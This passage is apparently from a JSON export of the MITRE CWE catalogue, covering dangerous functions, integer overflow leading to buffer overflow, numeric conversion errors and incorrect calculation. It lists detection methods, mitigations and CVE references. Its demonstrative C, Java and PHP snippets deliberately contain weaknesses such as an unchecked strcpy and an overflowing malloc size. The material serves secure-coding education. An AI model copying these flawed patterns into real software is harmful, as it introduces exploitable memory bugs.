useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Debugger"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Warning Flags","Source Code Quality Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Formal Methods / Correct-By-Construction","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Build and Compilation","Implementation"],"Description":"Identify a list of prohibited API functions and prohibit developers from using these functions, providing safer alternatives. In some cases, automatic code analysis tools or the compiler can be instructed to spot use of prohibited functions, such as the \\"banned.h\\" include file from Microsoft\'s SDL. [REF-554] [REF-7]"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-6"},"Intro_Text":"The following code attempts to create a local copy of a buffer to perform some manipulations to the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void manipulate_string(char * string){}","xhtml:div":{"#text":"char buf[24];strcpy(buf, string);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1470","Description":"Library has multiple buffer overflows using sprintf() and strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1470"},{"Reference":"CVE-2009-3849","Description":"Buffer overflow using strcat()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3849"},{"Reference":"CVE-2006-2114","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2114"},{"Reference":"CVE-2006-0963","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0963"},{"Reference":"CVE-2011-0712","Description":"Vulnerable use of strcpy() changed to use safer strlcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0712"},{"Reference":"CVE-2008-5005","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5005"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Dangerous Functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR07-C","Entry_Name":"Prefer functions that support error checking over equivalent functions that don\'t"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO01-C","Entry_Name":"Be careful using functions that use file names for identification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-554"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Safe String Handling" Page 156, 160"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "C String Handling", Page 388"}}]},"Notes":{"Note":{"#text":"This weakness is different than CWE-242 (Use of Inherently Dangerous Function). CWE-242 covers functions with such significant security problems that they can never be guaranteed to be safe. Some functions, if used properly, do not directly pose a security risk, but can introduce a weakness if not called correctly. These are regarded as potentially dangerous. A well-known example is the strcpy() function. When provided with a destination buffer that is larger than its source, strcpy() will not overflow. However, it is so often misused that some developers prohibit strcpy() entirely.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"680":{"attr":{"@_ID":"680","@_Name":"Integer Overflow to Buffer Overflow","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"190","@_View_ID":"709","@_Chain_ID":"680"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"}]}},"681":{"attr":{"@_ID":"681","@_Name":"Incorrect Conversion between Numeric Types","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"682","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Unexpected State","Quality Degradation"],"Note":"The program could wind up using the wrong number and generate incorrect results. If the number is used to allocate resources or make a security decision, then this could introduce a vulnerability."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid making conversion between numeric types. Always check for the allowed ranges."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example, a float literal is cast to an integer, thus causing a loss of precision.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"int i = (int) 33457.8f;"}},{"Intro_Text":"This code adds a float and an integer together, casting the result to an integer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$floatVal = 1.8345;$intVal = 3;$result = (int)$floatVal + $intVal;","xhtml:br":["",""]}},"Body_Text":"Normally, PHP will preserve the precision of this operation, making $result = 4.8345. After the cast to int, it is reasonable to expect PHP to follow rounding convention and set $result = 5. However, the explicit cast to int always rounds DOWN, so the final value of $result is 4. This behavior may have unintended consequences."},{"attr":{"@_Demonstrative_Example_ID":"DX-73"},"Intro_Text":"In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...if (result == ERROR)amount = -1;...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-74"},"Intro_Text":"In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...amount = accessmainframe();...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2007-4988","Description":"Chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988"},{"Reference":"CVE-2009-0231","Description":"Integer truncation of length value leads to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231"},{"Reference":"CVE-2008-3282","Description":"Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP34-C","Entry_Name":"Ensure that floating point conversions are within range of the new type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT15-C","Entry_Name":"Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT35-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM12-J","Entry_Name":"Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-681"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-681"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Observed_Examples, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"682":{"attr":{"@_ID":"682","@_Name":"Incorrect Calculation","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management.","Extended_Description":"When software performs a security-critical calculation incorrectly, it might lead to incorrect resource allocations, incorrect privilege assignments, or failed comparisons among other things. Many of the direct results of an incorrect calculation can lead to even larger problems such as failed protection mechanisms or even arbitrary code execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"170","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the incorrect calculation causes the program to move into an unexpected state, it may lead to a crash or impairment of service."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands"],"Note":"If the incorrect calculation is used in the context of resource allocation, it could lead to an out-of-bounds operation (CWE-119) leading to a crash or even arbitrary code execution. Alternatively, it may result in an integer overflow (CWE-190) and / or a resource consumption problem (CWE-400)."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"In the context of privilege or permissions assignment, an incorrect calculation can provide an attacker with access to sensitive resources."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If the incorrect calculation leads to an insufficient comparison (CWE-697), it may compromise a protection mechanism such as a validation routine and allow an attacker to bypass the security-critical code."}]},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Understand your programming language\'s underlying representation and how it interacts with numeric calculation. Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how your language handles numbers that are too large or too small for its underlying representation."},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range."},{"Phase":"Implementation","Description":"Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity."},{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":{"xhtml:p":["Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++)."]}},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++)."]}},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"Intro_Text":"This code attempts to calculate a football team\'s average number of yards gained per touchdown.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...int touchdowns = team.getTouchdowns();int yardsGained = team.getTotalYardage();System.out.println(team.getName() + \\" averages \\" + yardsGained / touchdowns + \\"yards gained for every touchdown scored\\");...","xhtml:br":["","","",""]}},"Body_Text":"The code does not consider the event that the team they are querying has not scored a touchdown, but has gained yardage. In that case, we should expect an ArithmeticException to be thrown by the JVM. This could lead to a loss of availability if our error handling code is not set up correctly."},{"attr":{"@_Demonstrative_Example_ID":"DX-55"},"Intro_Text":"This example attempts to calculate the position of the second byte of a pointer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *p = x;char * second_char = (char *)(p + 1);","xhtml:br":""}},"Body_Text":"In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-0022","Description":"chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022"},{"Reference":"CVE-2004-1363","Description":"substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP32-C","Entry_Name":"Prevent or detect domain and range errors in math functions","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT07-C","Entry_Name":"Use only explicitly signed or unsigned char type for numeric values"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT13-C","Entry_Name":"Use bitwise operators only on unsigned operands"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT33-C","Entry_Name":"Ensure that division and remainder operations do not result in divide-by-zero errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT34-C","Entry_Name":"Do not shift an expression by a negative number of bits or by greater than or equal to the number of bits that exist in the operand","Mapping_Fit":"CWE More 